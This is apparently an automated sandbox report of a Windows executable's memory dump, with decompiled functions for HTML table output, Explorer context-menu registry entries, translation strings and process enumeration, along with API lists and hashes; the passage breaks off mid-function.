Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfmemset$wcscpy$wcscat
String ID: bgcolor="%s"$ nowrap$ $</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
API String ID: 1607361635-601624466
Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00407B5D, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				E0040B550(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040ADC0(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040B1EC();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040ADC0(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040B1EC();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040B1EC();
				_t80 = _t79 + 0x10;
				E00407343(_a4, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040B1EC();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040B1EC();
						_t80 = _t81 + 0x1c;
						_t61 = E00407343(_a4, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}

0x00407b65
0x00407b7c
0x00407b83
0x00407b91
0x00407b98
0x00407ba6
0x00407bad
0x00407bb2
0x00407bb9
0x00407bca
0x00407bcb
0x00407bd6
0x00407bdb
0x00407bdc
0x00407be1
0x00407be1
0x00407be8
0x00407bf9
0x00407bfa
0x00407c05
0x00407c0a
0x00407c0b
0x00407c1c
0x00407c21
0x00407c21
0x00407c2a
0x00407c2b
0x00407c36
0x00407c3b
0x00407c3c
0x00407c41
0x00407c51
0x00407c56
0x00407c5b
0x00407c65
0x00407c68
0x00407c6b
0x00407c74
0x00407c7b
0x00407c80
0x00407c82
0x00407c88
0x00407ca6
0x00407c8a
0x00407c8a
0x00407c8b
0x00407c96
0x00407c9b
0x00407c9c
0x00407ca1
0x00407ca1
0x00407cb3
0x00407cb4
0x00407cbd
0x00407cc4
0x00407cc5
0x00407cd0
0x00407cd5
0x00407cd6
0x00407cdb
0x00407ceb
0x00407cf0
0x00407cf3
0x00407cf3
0x00407cf3
0x00000000
0x00407cfc
0x00407d00

APIs

memset.MSVCRT ref: 00407B83
memset.MSVCRT ref: 00407B98
memset.MSVCRT ref: 00407BAD
_snwprintf.MSVCRT ref: 00407BDC
_snwprintf.MSVCRT ref: 00407C0B
wcscpy.MSVCRT ref: 00407C1C
_snwprintf.MSVCRT ref: 00407C3C
memset.MSVCRT ref: 00407C7B
_snwprintf.MSVCRT ref: 00407C9C
_snwprintf.MSVCRT ref: 00407CD6

Part of subcall function 0040ADC0: _snwprintf.MSVCRT ref: 0040ADE4

Strings

</font>, xrefs: 00407C16
<table border="1" cellpadding="5"><tr%s>, xrefs: 00407C2B
<font color="%s">, xrefs: 00407BFA
<th%s>%s%s%s, xrefs: 00407CC5
width="%s", xrefs: 00407C8B
bgcolor="%s", xrefs: 00407BCB

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf$memset$wcscpy
String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
API String ID: 2000436516-3842416460
Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404415, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 124
registryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v24;
				intOrPtr _v28;
				short _v32;
				void _v2078;
				signed int _v2080;
				void _v4126;
				char _v4128;
				void _v6174;
				char _v6176;
				void _v8222;
				char _v8224;
				signed int _t49;
				short _t55;
				intOrPtr _t56;
				int _t73;
				intOrPtr _t78;

				_t76 = __ecx;
				E0040B550(0x201c, __ecx);
				_t73 = 0;
				if(E004043F8( &_v8, 0x2001f) != 0) {
					L6:
					return _t73;
				}
				_v6176 = 0;
				memset( &_v6174, 0, 0x7fe);
				_t78 = _a4;
				_push(_t78 + 0x20a);
				_push(_t78);
				_push(L"%s\\shell\\%s\\command");
				_push(0x3ff);
				_push( &_v6176);
				L0040B1EC();
				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
					asm("sbb ebx, ebx");
					_t73 =  ~_t49 + 1;
					RegCloseKey(_v12);
					_v2080 = _v2080 & 0x00000000;
					memset( &_v2078, 0, 0x7fe);
					E00404AD9( &_v2080);
					if(_v2078 == 0x3a) {
						_t55 =  *L"C:\\"; // 0x3a0043
						_v32 = _t55;
						_t56 =  *0x40ccdc; // 0x5c
						_v28 = _t56;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_v32 = _v2080;
						if(GetDriveTypeW( &_v32) == 3) {
							_v4128 = 0;
							memset( &_v4126, 0, 0x7fe);
							_v8224 = 0;
							memset( &_v8222, 0, 0x7fe);
							_push(_a4 + 0x20a);
							_push(_a4);
							_push(L"%s\\shell\\%s");
							_push(0x3ff);
							_push( &_v8224);
							L0040B1EC();
							_push( &_v2080);
							_push(L"\"%s\",0");
							_push(0x3ff);
							_push( &_v4128);
							L0040B1EC();
							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
						}
					}
				}
				RegCloseKey(_v8);
				goto L6;
			}

0x00404415
0x0040441d
0x0040442c
0x00404435
0x004045b3
0x004045b7
0x004045b7
0x0040444b
0x00404452
0x00404457
0x00404460
0x00404461
0x00404462
0x0040446d
0x00404472
0x00404473
0x00404490
0x004044a5
0x004044b4
0x004044b6
0x004044b7
0x004044bd
0x004044cf
0x004044db
0x004044eb
0x004044f1
0x004044f6
0x004044f9
0x004044fe
0x00404506
0x00404507
0x00404508
0x00404510
0x00404521
0x00404532
0x00404539
0x00404547
0x0040454e
0x0040455b
0x0040455c
0x00404564
0x0040456f
0x00404570
0x00404571
0x0040457c
0x0040457d
0x00404588
0x00404589
0x0040458a
0x004045a0
0x004045a5
0x00404521
0x004044eb
0x004045ab
0x00000000

APIs

memset.MSVCRT ref: 00404452
_snwprintf.MSVCRT ref: 00404473

Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC

RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB

Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13

RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
memset.MSVCRT ref: 004044CF

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

GetDriveTypeW.KERNEL32(?), ref: 00404518
memset.MSVCRT ref: 00404539
memset.MSVCRT ref: 0040454E
_snwprintf.MSVCRT ref: 00404571
_snwprintf.MSVCRT ref: 0040458A

Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57

Strings

"%s",0, xrefs: 0040457D
C:\, xrefs: 004044F1
:, xrefs: 004044E3
%s\shell\%s, xrefs: 00404564
%s\shell\%s\command, xrefs: 00404462

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
API String ID: 486436031-734527199
Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040645E, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040B550(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_pop(_t44);
				E00405AA7( &_v5164);
				_t27 = E0040B04D( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x40fb90, _a8);
				wcscpy(0x40fda0, L"general");
				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
				E00405FAC(_t61, L"Version",  &_v1044, 1);
				E00405FAC(_t61, L"RTL", "0", 0);
				EnumResourceNamesW(_a4, 4, E0040620E, 0);
				EnumResourceNamesW(_a4, 5, E0040620E, 0);
				wcscpy(0x40fda0, L"strings");
				_t38 = E00406337(_t44, _t61, _a4);
				 *0x40fb90 =  *0x40fb90 & 0x00000000;
				return _t38;
			}

0x00406466
0x0040647d
0x00406484
0x00406499
0x004064a0
0x004064af
0x004064b4
0x004064bb
0x004064cd
0x004064d2
0x004064d4
0x004064e4
0x004064ea
0x004064ea
0x004064f3
0x00406503
0x00406514
0x00406525
0x0040653b
0x0040654e
0x00406568
0x00406572
0x0040657a
0x00406582
0x0040658a
0x00406596

APIs

memset.MSVCRT ref: 00406484
memset.MSVCRT ref: 004064A0

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128

wcscpy.MSVCRT ref: 004064E4
wcscpy.MSVCRT ref: 004064F3
wcscpy.MSVCRT ref: 00406503
EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
wcscpy.MSVCRT ref: 0040657A

Strings

strings, xrefs: 00406574
TranslatorName, xrefs: 0040650F
TranslatorURL, xrefs: 00406520
general, xrefs: 004064F8
RTL, xrefs: 00406549
SFM, xrefs: 00406502
Version, xrefs: 00406536

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
API String ID: 3037099051-2314623505
Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED

Uniqueness

Uniqueness Score: -1.00%

Function 00409A94, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 154
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00409A94(long _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				void _v315;
				char _v316;
				void _v826;
				char _v828;
				void _v1338;
				char _v1340;
				void* __esi;
				void* _t61;
				_Unknown_base(*)()* _t93;
				void* _t94;
				int _t106;
				void* _t108;
				void* _t110;

				_v828 = 0;
				memset( &_v826, 0, 0x1fe);
				_v1340 = 0;
				memset( &_v1338, 0, 0x1fe);
				_t110 = _t108 + 0x18;
				_t61 = OpenProcess(0x400, 0, _a4);
				_t113 = _t61;
				_v20 = _t61;
				if(_t61 == 0) {
					L11:
					if(_v828 == 0) {
						__eflags = 0;
						return 0;
					}
					_push( &_v828);
					_push( &_v1340);
					_push(L"%s\\%s");
					_push(0xff);
					_push(_a8);
					L0040B1EC();
					return 1;
				}
				_v8 = 0;
				_v24 = 0;
				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
				_t106 = _v24;
				if(_t106 == 0) {
					_t32 =  &_v20; // 0x4059ec
					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
					_v316 = 0;
					memset( &_v315, 0, 0xfe);
					_t110 = _t110 + 0x20;
					_v16 = 0xff;
					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
					if(__eflags == 0) {
						L9:
						CloseHandle(_v20);
						if(_v8 != 0) {
							FreeLibrary(_v8);
						}
						goto L11;
					}
					_push( &_v28);
					_push( &_a4);
					_push( &_v1340);
					_push( &_v12);
					_push( &_v828);
					_a4 = 0xff;
					_push( &_v316);
					L8:
					_v12 = 0xff;
					E0040906D( &_v8, _t117);
					goto L9;
				}
				_v316 = 0;
				memset( &_v315, 0, 0xff);
				_v12 = _t106;
				_t110 = _t110 + 0xc;
				_a4 = 0;
				if(E00408F72( &_v8) == 0) {
					goto L9;
				}
				_t93 = GetProcAddress(_v8, "GetTokenInformation");
				if(_t93 == 0) {
					goto L9;
				}
				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
				_t117 = _t94;
				if(_t94 == 0) {
					goto L9;
				}
				_push( &_v28);
				_push( &_v12);
				_push( &_v1340);
				_push( &_v16);
				_push( &_v828);
				_push(_v316);
				_v16 = 0xff;
				goto L8;
			}

0x00409ab0
0x00409ab7
0x00409ac8
0x00409acf
0x00409ad4
0x00409ae0
0x00409ae6
0x00409ae8
0x00409af0
0x00409c3a
0x00409c41
0x00409c67
0x00000000
0x00409c67
0x00409c49
0x00409c50
0x00409c51
0x00409c56
0x00409c57
0x00409c5a
0x00000000
0x00409c64
0x00409b00
0x00409b03
0x00409b06
0x00409b0b
0x00409b10
0x00409ba9
0x00409bac
0x00409bc1
0x00409bc7
0x00409bcc
0x00409bd8
0x00409bf0
0x00409bf2
0x00409c23
0x00409c26
0x00409c2f
0x00409c34
0x00409c34
0x00000000
0x00409c2f
0x00409bf7
0x00409bfb
0x00409c02
0x00409c06
0x00409c0d
0x00409c14
0x00409c17
0x00409c18
0x00409c1b
0x00409c1e
0x00000000
0x00409c1e
0x00409b1f
0x00409b25
0x00409b2a
0x00409b2d
0x00409b33
0x00409b3d
0x00000000
0x00000000
0x00409b4b
0x00409b53
0x00000000
0x00000000
0x00409b6a
0x00409b6c
0x00409b6e
0x00000000
0x00000000
0x00409b77
0x00409b7b
0x00409b82
0x00409b86
0x00409b8d
0x00409b8e
0x00409b94
0x00000000

APIs

memset.MSVCRT ref: 00409AB7
memset.MSVCRT ref: 00409ACF
OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
_snwprintf.MSVCRT ref: 00409C5A

Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8

memset.MSVCRT ref: 00409B25
GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
memset.MSVCRT ref: 00409BC7
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34

Strings

GetTokenInformation, xrefs: 00409B43
%s\%s, xrefs: 00409C51
Y@, xrefs: 00409BA9

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
String ID: %s\%s$GetTokenInformation$Y@
API String ID: 3504373036-27875219
Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409172, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409172() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t5;

				if( *0x4101bc != 0) {
					return _t1;
				}
				_t2 = E00405436(L"psapi.dll");
				_t5 = _t2;
				if(_t5 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
					 *0x40f848 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t5, "EnumProcessModules");
						 *0x40f840 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
							 *0x40f838 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t5, "EnumProcesses");
								 *0x40fa6c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t5, "GetModuleInformation");
									 *0x40f844 = _t2;
									if(_t2 != 0) {
										 *0x4101bc = 1;
									}
								}
							}
						}
					}
					if( *0x4101bc == 0) {
						_t2 = FreeLibrary(_t5);
					}
					goto L10;
				}
			}

0x00409179
0x00409209
0x00409209
0x00409185
0x0040918a
0x0040918f
0x00409208
0x00000000
0x00409191
0x0040919e
0x004091a2
0x004091a7
0x004091af
0x004091b3
0x004091b8
0x004091c0
0x004091c4
0x004091c9
0x004091d1
0x004091d5
0x004091da
0x004091e2
0x004091e6
0x004091eb
0x004091ed
0x004091ed
0x004091eb
0x004091da
0x004091c9
0x004091b8
0x004091ff
0x00409202
0x00409202
0x00000000
0x004091ff

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
FreeLibrary.KERNEL32(00000000), ref: 00409202

Strings

GetModuleFileNameExW, xrefs: 004091BA
psapi.dll, xrefs: 00409180
EnumProcessModules, xrefs: 004091A9
GetModuleInformation, xrefs: 004091DC
GetModuleBaseNameW, xrefs: 00409198
EnumProcesses, xrefs: 004091CB

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Library$Load$Freememsetwcscat
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 1182944575-70141382
Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C

Uniqueness

Uniqueness Score: -1.00%

Function 004090EE, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004090EE() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x4101b8 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x40f83c = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x40f834 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x40f830 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x40f5c4 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x40f828 = _t2;
								if(_t2 != 0) {
									 *0x4101b8 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}

0x004090f5
0x00409171
0x00409171
0x004090fd
0x00409103
0x00409107
0x00409170
0x00000000
0x00409170
0x00409116
0x0040911a
0x0040911f
0x00409127
0x0040912b
0x00409130
0x00409138
0x0040913c
0x00409141
0x00409149
0x0040914d
0x00409152
0x0040915a
0x0040915e
0x00409163
0x00409165
0x00409165
0x00409163
0x00409152
0x00409141
0x00409130
0x00000000

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A

Strings

Module32Next, xrefs: 00409132
kernel32.dll, xrefs: 004090F8
Module32First, xrefs: 00409121
CreateToolhelp32Snapshot, xrefs: 00409110
Process32First, xrefs: 00409143
Process32Next, xrefs: 00409154

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
API String ID: 667068680-3953557276
Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C

Uniqueness

Uniqueness Score: -1.00%

Function 00409F9C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					L0040B1EC();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040B1EC();
